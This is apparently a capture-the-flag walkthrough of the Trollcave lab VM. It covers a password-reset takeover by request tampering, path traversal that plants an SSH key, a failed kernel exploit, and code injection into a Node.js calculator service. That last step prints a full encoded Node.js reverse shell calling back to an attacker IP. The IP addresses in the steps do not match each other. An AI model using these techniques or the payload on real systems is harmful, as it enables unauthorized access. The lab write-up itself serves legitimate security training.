Preface
⏰Date: 2023.6.26
🗺️Target machine: https://www.vulnhub.com/entry/trollcave-12,230/
⚠️Everything in this article was done inside the lab environment of the target VM; never use it against real systems without authorization.
🙏My skills are limited, so corrections are welcome if you spot a mistake. Thank you for reading!
🎉Feel free to follow🔍, like👍, bookmark⭐️ and comment📝
Information gathering
Host discovery first: .128 is the Kali box, so the target is 192.168.58.132.
Then scan what .132 has open: nmap -sS -A -T4 -v -p- 192.168.58.132
Port 80 hosts the web application.
Directory brute-forcing with dirsearch (dirb works just as well) turned up nothing useful, and robots.txt contains nothing of interest either.
Browsing the site, the home page has a "password reset" entry whose page says to visit password_resets.
Requesting that path directly doesn't work, so I used password_resets as the base path and brute-forced directories underneath it.
Password reset
Visiting http://192.168.58.132/password_resets/new opens the reset page; entering xer in the box and clicking reset returns a reset link.
Opening the link and entering a new password (at least 10 characters) logs you straight in once you confirm.
Once inside there is a file upload, but the feature is disabled so nothing can be uploaded; the guestbook does not pop a cookie either, because tags are entity-encoded.
The users page lists a king user who is a superadmin, which brings the reset link back to mind: it contains ?name=xer, so the user whose password gets reset is identified by the name parameter. Simply changing xer to king in the link does not work (resets can only be requested for ordinary users), so the tampering has to be done on an intercepted request instead.
Log out of the xer account, request a reset for some user again on the reset page, open the link, intercept the request that submits the new password, and change the username field in it to King.
Forward the request and you land in King's logged-in session.
Passwordless SSH login
As shown in the screenshot, after enabling upload you can upload a one-line PHP shell; right-clicking delete reveals the stored path.
Browsing to it shows the server does not execute PHP, so that route is a dead end.
The home page has a "sudo give me sudo" entry; it says to use the rails user.
Port 22 is open, so combined with the file upload we can drop an SSH public key and log in without a password.
Generate a key pair on Kali: ssh-keygen -t rsa
The upload response shows the absolute path of the stored file, and both the filename and the path can be set at upload time, so traversing with ../ to /home/rails/.ssh/authorized_keys writes the key exactly where it is needed.
ssh -i id_rsa rails@192.168.58.132 then logs in over SSH.
Privilege escalation
Run /bin/bash -i to get an interactive shell.
There is no SUID find to abuse, so check the kernel version instead.
In msf: search 4.4.0-116
The target has no gcc.
Compiled the exploit on Kali and ran it on the target; it failed.
Since that failed, try another route.
Node.js
In /home/king there is calc.js, which refers to a service on 127.0.0.1:8888.
Check the listening ports:
rails@trollcave:/home/king/calc$ netstat -antulp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3000 0.0.0.0:* LISTEN 1065/ruby2.3
tcp 0 0 127.0.0.1:8888 0.0.0.0:* LISTEN -
The filename (calc) hints at what the service is: a calculator.
It converts the submitted sum to a string with toString and evaluates it, so the sum can be replaced with reverse-shell JavaScript.
Generate a Node.js reverse shell with msfvenom:
msfvenom -p nodejs/shell_reverse_tcp lhost=192.168.58.153 lport=8888 -o rev.js
Then append one more statement to it:
echo '1+1;' >> rev.js
Forward the target's loopback port 8888 to local port 9999:
ssh -L9999:localhost:8888 -i id_rsa rails@192.168.58.209 -f -N
Local port 9999 now reaches the calculator.
Use a short Python script to turn rev.js into character codes wrapped in eval(String.fromCharCode(...)), so the payload sent to the calculator contains only digits and commas inside the call:
#!/usr/bin/env python
# Read rev.js and emit eval(String.fromCharCode(<code>,<code>,...)).
# Works under both python2 and python3.
with open('rev.js', 'r') as f:
    codes = [str(ord(c)) for c in f.read()]
print('eval(String.fromCharCode(%s))' % ','.join(codes))
┌──(root㉿Erik)-[~eric/myfile]
└─# python2 encode.py
eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,123,32,118,97,114,32,114,101,113,117,105,114,101,32,61,32,103,108,111,98,97,108,46,114,101,113,117,105,114,101,32,124,124,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,59,32,105,102,32,40,33,114,101,113,117,105,114,101,41,32,114,101,116,117,114,110,59,32,118,97,114,32,99,109,100,32,61,32,40,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,112,108,97,116,102,111,114,109,46,109,97,116,99,104,40,47,94,119,105,110,47,105,41,41,32,63,32,34,99,109,100,34,32,58,32,34,47,98,105,110,47,115,104,34,59,32,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,34,110,101,116,34,41,44,32,99,112,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,44,32,117,116,105,108,32,61,32,114,101,113,117,105,114,101,40,34,117,116,105,108,34,41,44,32,115,104,32,61,32,99,112,46,115,112,97,119,110,40,99,109,100,44,32,91,93,41,59,32,118,97,114,32,99,108,105,101,110,116,32,61,32,116,104,105,115,59,32,118,97,114,32,99,111,117,110,116,101,114,61,48,59,32,102,117,110,99,116,105,111,110,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,32,61,32,110,101,116,46,99,111,110,110,101,99,116,40,56,56,56,56,44,32,34,49,57,50,46,49,54,56,46,53,56,46,49,53,51,34,44,32,102,117,110,99,116,105,111,110,40,41,32,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,32,105,102,32,40,116,121,112,101,111,102,32,117,116,105,108,46,112,117,109,112,32,61,61,61,32,34,117,110,100,101,102,105,110,101,100,34,41,32,123,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,101,108,115,101,32,123,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,111,117,116,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,101,114,114,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,125,41,59,32,115,111,99,107,101,116,46,111,110,40,34,101,114,114,111,114,34,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,41,32,123,32,99,111,117,110,116,101,114,43,43,59,32,105,102,40,99,111,117,110,116,101,114,60,61,32,49,48,41,123,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,32,123,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,125,44,32,53,42,49,48,48,48,41,59,32,125,32,101,108,115,101,32,112,114,111,99,101,115,115,46,101,120,105,116,40,41,59,32,125,41,59,32,125,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,32,125,41,40,41,59,49,43,49,59,10))